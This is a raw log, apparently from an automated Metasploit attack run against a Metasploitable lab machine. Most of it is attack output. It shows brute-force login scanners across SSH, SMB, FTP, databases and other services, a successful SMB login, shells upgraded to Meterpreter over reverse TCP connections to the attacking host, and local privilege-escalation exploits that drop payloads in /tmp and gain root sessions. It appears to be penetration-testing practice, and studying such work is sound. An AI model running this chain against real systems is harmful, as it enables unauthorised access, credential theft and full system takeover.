  http://www.osvdb.org/60317
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

Exploit running as background job.
Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.

*++*Exploit auxiliary/scanner/http/tomcat_mgr_login for CVE 2010-4094

       Name: Tomcat Application Manager Login Utility
     Module: auxiliary/scanner/http/tomcat_mgr_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  MC
  Matteo Cantoni
  jduck

Basic options:
  Name              Current Setting                                                                 Required  Description
  ----              ---------------                                                                 --------  -----------
  BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
  PASSWORD                                                                                          no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.26.134                                                                  yes       The target address range or CIDR identifier
  RPORT             8080                                                                            yes       The target port
  SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
  STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
  TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
  THREADS           1                                                                               yes       The number of concurrent threads
  USERNAME                                                                                          no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                                           no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
  VERBOSE           true                                                                            yes       Whether to print output for all attempts
  VHOST                                                                                             no        HTTP server virtual host

Description:
  This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.

References:
  http://cvedetails.com/cve/2009-3843/
  http://www.osvdb.org/60317
  http://www.securityfocus.com/bid/37086
  http://cvedetails.com/cve/2009-4189/
  http://www.osvdb.org/60670
  http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
  http://www.zerodayinitiative.com/advisories/ZDI-09-085
  http://cvedetails.com/cve/2009-4188/
  http://www.securityfocus.com/bid/38084
  http://cvedetails.com/cve/2010-0557/
  http://www-01.ibm.com/support/docview.wss?uid=swg21419179
  http://cvedetails.com/cve/2010-4094/
  http://www.zerodayinitiative.com/advisories/ZDI-10-214
  http://cvedetails.com/cve/2009-3548/
  http://www.osvdb.org/60176
  http://www.securityfocus.com/bid/36954
  http://tomcat.apache.org/
  http://cvedetails.com/cve/1999-0502/

Auxiliary module running as background job
192.168.26.134:8080 TOMCAT_MGR - /manager/html - The connection was refused by the remote host (192.168.26.134:8080).
Scanned 1 of 1 hosts (100% complete) VERBOSE => false PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt Exploit: auxiliary/scanner/http/http_login Name: HTTP Login Utility Module: auxiliary/scanner/http/http_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: hdm Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- AUTH_URI no The URI to authenticate against (default:auto) BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET) RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing users, one per line VERBOSE false yes Whether to print output for all attempts VHOST no HTTP server virtual host Description: This module attempts to authenticate to an HTTP service. References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job http://192.168.26.134:80 No URI found that asks for HTTP authentication Scanned 1 of 1 hosts (100% complete) Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. 
Exploit: auxiliary/scanner/vnc/vnc_login Name: VNC Authentication Scanner Module: auxiliary/scanner/vnc/vnc_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: carstein jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no The password to test PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 5900 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method. 
References: http://cvedetails.com/cve/1999-0506/ Auxiliary module running as background job 192.168.26.134:5900 - 192.168.26.134:5900 - Starting VNC login sweep Exploit: auxiliary/scanner/postgres/postgres_login Name: PostgreSQL Login Utility Module: auxiliary/scanner/postgres/postgres_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE template1 yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RETURN_ROWSET true no Set to true to see query result sets RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing users, one per line VERBOSE false yes Whether to print output for all attempts Description: This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes. References: http://www.postgresql.org http://cvedetails.com/cve/1999-0502/ https://hashcat.net/forum/archive/index.php?thread-4148.html Auxiliary module running as background job Exploit: auxiliary/scanner/mysql/mysql_login Name: MySQL Login Utility Module: auxiliary/scanner/mysql/mysql_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: Bernardo Damele A. G. 
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 3306 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module simply queries the MySQL instance for a specific user/pass (default is root with blank). 
References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Exploit: auxiliary/scanner/ftp/ftp_login Name: FTP Authentication Scanner Module: auxiliary/scanner/ftp/ftp_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RECORD_GUEST false no Record anonymous/guest logins to the database RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 21 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. 
References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job 192.168.26.134:21 - 192.168.26.134:21 - Starting FTP login sweep Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. Exploit: auxiliary/scanner/rservices/rlogin_login Name: rlogin Authentication Scanner Module: auxiliary/scanner/rservices/rlogin_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: jduck Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list FROMUSER no The username to login from FROMUSER_FILE /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt no File containing from usernames, one per line PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 513 yes The target port SPEED 9600 yes The terminal speed desired STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TERM vt100 yes The terminal type desired THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all 
users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). References: http://cvedetails.com/cve/1999-0651/ http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. 192.168.26.134:513 - 192.168.26.134:513 - Starting rlogin sweep Exploit: auxiliary/scanner/smb/smb_login Name: SMB Login Check Scanner Module: auxiliary/scanner/smb/smb_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: tebo Ben Campbell Brandon McCann "zeknox" Tom Sellers Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line PRESERVE_DOMAINS true no Respect a username that contains a domain name. Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RECORD_GUEST false no Record guest-privileged random logins to the database RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 445 yes The SMB service port SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. References: http://cvedetails.com/cve/1999-0506/ Auxiliary module running as background job Exploit: auxiliary/scanner/tftp/tftpbrute Name: TFTP Brute Forcer Module: auxiliary/scanner/tftp/tftpbrute License: BSD License Rank: Normal Provided by: antoine Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address DICTIONARY /usr/share/metasploit-framework/data/wordlists/tftp.txt yes The list of filenames RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 69 yes The target port THREADS 1 yes The number of concurrent threads Description: This module uses a dictionary to brute force valid TFTP image names from a TFTP server. 192.168.26.134:445 - 192.168.26.134:445 SMB - Success: '.\:123456' Guest Auxiliary module running as background job Exploit: auxiliary/scanner/dns/dns_amp 192.168.26.134:445 - No active DB -- Credential data will not be saved! 
Name: DNS Amplification Scanner Module: auxiliary/scanner/dns/dns_amp License: Metasploit Framework License (BSD) Rank: Normal Provided by: xistence Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set DOMAINNAME isc.org yes Domain to use for the DNS request FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process QUERYTYPE ANY yes Query type(A, NS, SOA, MX, TXT, AAAA, RRSIG, DNSKEY, ANY) RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 53 yes The target port SNAPLEN 65535 yes The number of bytes to capture THREADS 10 yes The number of concurrent threads TIMEOUT 500 yes The number of seconds to wait for new data Description: This module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplication attack against a third party. Auxiliary module running as background job Sending DNS probes to 192.168.26.134->192.168.26.134 (1 hosts) Sending 67 bytes to each host using the IN ANY isc.org request Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. 
Exploit: auxiliary/scanner/telnet/telnet_login Name: Telnet Login Check Scanner Module: auxiliary/scanner/telnet/telnet_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: egypt Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 23 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. 
References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Exploit: auxiliary/scanner/ssh/ssh_login Name: SSH Login Check Scanner Module: auxiliary/scanner/ssh/ssh_login License: Metasploit Framework License (BSD) Rank: Normal Provided by: todb Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt no File containing passwords, one per line RHOSTS 192.168.26.134 yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Description: This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. References: http://cvedetails.com/cve/1999-0502/ Auxiliary module running as background job Usage: info [mod2 mod3 ...] Options: * The flag '-j' will print the data in json format * The flag '-d' will show the markdown version with a browser. 
More info, but could be slow. Queries the supplied module or modules for information. If no module is given, show info for the currently active module. Unknown command: exploit. 192.168.26.134:22 SSH - Starting bruteforce Executing 'post/multi/manage/shell_to_meterpreter' on session(s): ] Upgrading session ID: 1 192.168.26.134:513 - Scanned 1 of 1 hosts (100% complete) Scanned 1 of 1 hosts (100% complete) 192.168.26.134:23 - No active DB -- Credential data will not be saved! No active DB -- Credential data will not be saved! Platform: Linux Upgrade payload: linux/x86/meterpreter/reverse_tcp Starting exploit/multi/handler Started reverse TCP handler on 192.168.26.207:4433 Starting the payload handler... Transfer method: Bourne shell [fallback] Starting transfer... Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Command stager progress: 100.00% (668/668 bytes) Cleaning up handler Meterpreter session 3 opened (192.168.26.207:4433 -> 192.168.26.134:44060) at 2016-05-26 12:33:36 +0100 Executing 'post/multi/manage/shell_to_meterpreter' on session(s): ] Upgrading session ID: 2 Platform: Linux Upgrade payload: linux/x86/meterpreter/reverse_tcp Starting exploit/multi/handler Started reverse TCP handler on 192.168.26.207:4433 Starting the payload handler... Transfer method: Bourne shell [fallback] Starting transfer... 
Transmitting intermediate stager for over-sized stage...(105 bytes) Sending stage (1495599 bytes) to 192.168.26.134 Command stager progress: 100.00% (668/668 bytes) Cleaning up handler Meterpreter session 4 opened (192.168.26.207:4433 -> 192.168.26.134:44061) at 2016-05-26 12:34:26 +0100 Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell unix 192.168.26.207:4444 -> 192.168.26.134:55144 (192.168.26.134) 2 shell unix 192.168.26.207:4444 -> 192.168.26.134:55146 (192.168.26.134) 3 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ metasploitable 192.168.26.207:4433 -> 192.168.26.134:44060 (192.168.26.134) 4 meterpreter x86/linux 192.168.26.207:4433 -> 192.168.26.134:44061 (192.168.26.134) Select session numbers? Scanned 1 of 1 hosts (100% complete) SESSION => 3 192.168.26.134 - Collecting local exploits for x86/linux... 192.168.26.134 - 6 exploit checks are being tried... 192.168.26.134 - exploit/linux/local/desktop_privilege_escalation 192.168.26.134 - exploit/linux/local/pkexec 192.168.26.134 - exploit/linux/local/sock_sendpage 192.168.26.134 - exploit/linux/local/sophos_wpa_clear_keys 192.168.26.134 - exploit/linux/local/udev_netlink 192.168.26.134 - exploit/linux/local/vmware_mount 192.168.26.134 - exploit/linux/local/desktop_privilege_escalation: The target is not exploitable. 192.168.26.134 - exploit/linux/local/pkexec: This module does not support check. 192.168.26.134 - exploit/linux/local/sock_sendpage: This module does not support check. 192.168.26.134 - exploit/linux/local/sophos_wpa_clear_keys: The target is not exploitable. 192.168.26.134 - exploit/linux/local/udev_netlink: This module does not support check. 192.168.26.134 - exploit/linux/local/vmware_mount: The target is not exploitable. 
Post module execution completed PostExploit: exploit/linux/local/desktop_privilege_escalation Name: Desktop Linux Password Stealer and Privilege Escalation Module: exploit/linux/local/desktop_privilege_escalation Platform: Linux Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2014-08-07 Provided by: Jakob Lell Available targets: Id Name -- ---- 0 Linux x86 1 Linux x86_64 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 3 yes The session to run this module on. WritableDir /tmp yes A directory for storing temporary files on the target system Payload information: Description: This module steals the user password of an administrative user on a desktop Linux system when it is entered for unlocking the screen or for doing administrative actions using PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password. It exploits the design weakness that there is no trusted channel for transferring the password from the keyboard to the actual password verificatition against the shadow file (which is running as root since /etc/shadow is only readable to the root user). Both screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under the current user account to query for the password and then pass it to a setuid-root binary to do the password verification. Therefore, it is possible to inject a password stealer after compromising the user account. Since sudo requires only the user password (and not the root password of the system), stealing the user password of an administrative user directly allows escalating to root privileges. Please note, you have to start a handler as a background job before running this exploit since the exploit will only create a shell when the user actually enters the password (which may be hours after launching the exploit). 
Using exploit/multi/handler with the option ExitOnSession set to false should do the job.
Writing payload executable to '/tmp/szJeEkI.elf'
Writing lib file to '/tmp/xbx.so'
Restarting processes (screensaver/policykit)
The exploit module has finished. However, getting a shell will probably take a while (until the user actually enters the password). Remember to keep a handler running.

PostExploit: exploit/linux/local/pkexec

       Name: Linux PolicyKit Race Condition Privilege Escalation
     Module: exploit/linux/local/pkexec
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2011-04-01

Provided by:
  xi4oyu
  0a29406d9794e4f9b30b3c5d6702c708

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x64

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  Count            500              yes       Number of attempts to win the race condition
  DEBUG_EXPLOIT    false            yes       Make the exploit executable be verbose about what it's doing
  ListenerTimeout  60               yes       Number of seconds to wait for the exploit
  SESSION          3                yes       The session to run this module on.
  WritableDir      /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  A race condition flaw was found in the PolicyKit pkexec utility and polkitd daemon. A local user could use this flaw to appear as a privileged user to pkexec, allowing them to execute arbitrary commands as root by running those commands with pkexec.
  Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10), 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)

References:
  http://cvedetails.com/cve/2011-1485/
  https://www.exploit-db.com/exploits/17942
  http://www.osvdb.org/72261

Started reverse TCP handler on 192.168.26.207:4444
Writing exploit executable to /tmp/1Ag85utB (4346 bytes)
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Starting the payload handler...
Meterpreter session 5 opened (192.168.26.207:4444 -> 192.168.26.134:53178) at 2016-05-26 12:38:10 +0100
> Background session 5? [y/N]

PostExploit: exploit/linux/local/sock_sendpage

       Name: Linux Kernel Sendpage Local Privilege Escalation
     Module: exploit/linux/local/sock_sendpage
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-08-13

Provided by:
  Tavis Ormandy
  Julien Tinnes
  spender
  rcvalle
  egypt

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  DEBUG_EXPLOIT  false            yes       Make the exploit executable be verbose about what it's doing
  SESSION        3                yes       The session to run this module on.
  WritableDir    /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c.
  All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4

References:
  http://cvedetails.com/cve/2009-2692/
  http://www.osvdb.org/56992
  http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html

Started reverse TCP handler on 192.168.26.207:4444
Writing exploit executable to /tmp/boX7kHRl (4069 bytes)
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Meterpreter session 6 opened (192.168.26.207:4444 -> 192.168.26.134:53179) at 2016-05-26 12:38:38 +0100
> Background session 6? [y/N]

PostExploit: exploit/linux/local/sophos_wpa_clear_keys

       Name: Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation
     Module: exploit/linux/local/sophos_wpa_clear_keys
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2013-09-06

Provided by:
  Francisco Falcon
  juan vazquez

Available targets:
  Id  Name
  --  ----
  0   Linux x86

Basic options:
  Name         Current Setting             Required  Description
  ----         ---------------             --------  -----------
  SESSION      3                           yes       The session to run this module on.
  WritableDir  /tmp                        yes       A directory where we can write files
  clear_keys   /opt/cma/bin/clear_keys.pl  yes       Path to the clear_keys.pl vulnerable script

Payload information:

Description:
  This module abuses a command injection on the clear_keys.pl perl script, installed with the Sophos Web Protection Appliance, to escalate privileges from the "spiderman" user to "root". This module is useful for post exploitation of vulnerabilities on the Sophos Web Protection Appliance web ui, executed by the "spiderman" user. This module has been tested successfully on Sophos Virtual Web Appliance 3.7.0.

References:
  http://cvedetails.com/cve/2013-4984/
  http://www.osvdb.org/97028
  http://www.securityfocus.com/bid/62265
  http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities

Started reverse TCP handler on 192.168.26.207:4444
Checking actual user...
Exploit aborted due to failure: no-access: The actual user is "root", you must be "spiderman" to exploit this
Exploit completed, but no session was created.

PostExploit: exploit/linux/local/udev_netlink

       Name: Linux udev Netlink Local Privilege Escalation
     Module: exploit/linux/local/udev_netlink
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-04-16

Provided by:
  kcope
  Jon Oberheide
  egypt

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x64

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  NetlinkPID                    no        Usually udevd pid-1. Meterpreter sessions will autodetect
  SESSION      3                yes       The session to run this module on.
  WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload information:

Description:
  Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland.

References:
  http://cvedetails.com/cve/2009-1185/
  http://www.osvdb.org/53810
  http://www.securityfocus.com/bid/34536

Started reverse TCP handler on 192.168.26.207:4444
Attempting to autodetect netlink pid...
Meterpreter session, using get_processes to find netlink pid
udev pid: 2352
Found netlink pid: 2351
Writing payload executable (155 bytes) to /tmp/THcetTkbAj
Writing exploit executable (1879 bytes) to /tmp/EiRNhDoVNp
chmod'ing and running it...
Transmitting intermediate stager for over-sized stage...(105 bytes)
Sending stage (1495599 bytes) to 192.168.26.134
Meterpreter session 7 opened (192.168.26.207:4444 -> 192.168.26.134:53180) at 2016-05-26 12:39:20 +0100
> Background session 7? [y/N]

PostExploit: exploit/linux/local/vmware_mount

       Name: VMWare Setuid vmware-mount Unsafe popen(3)
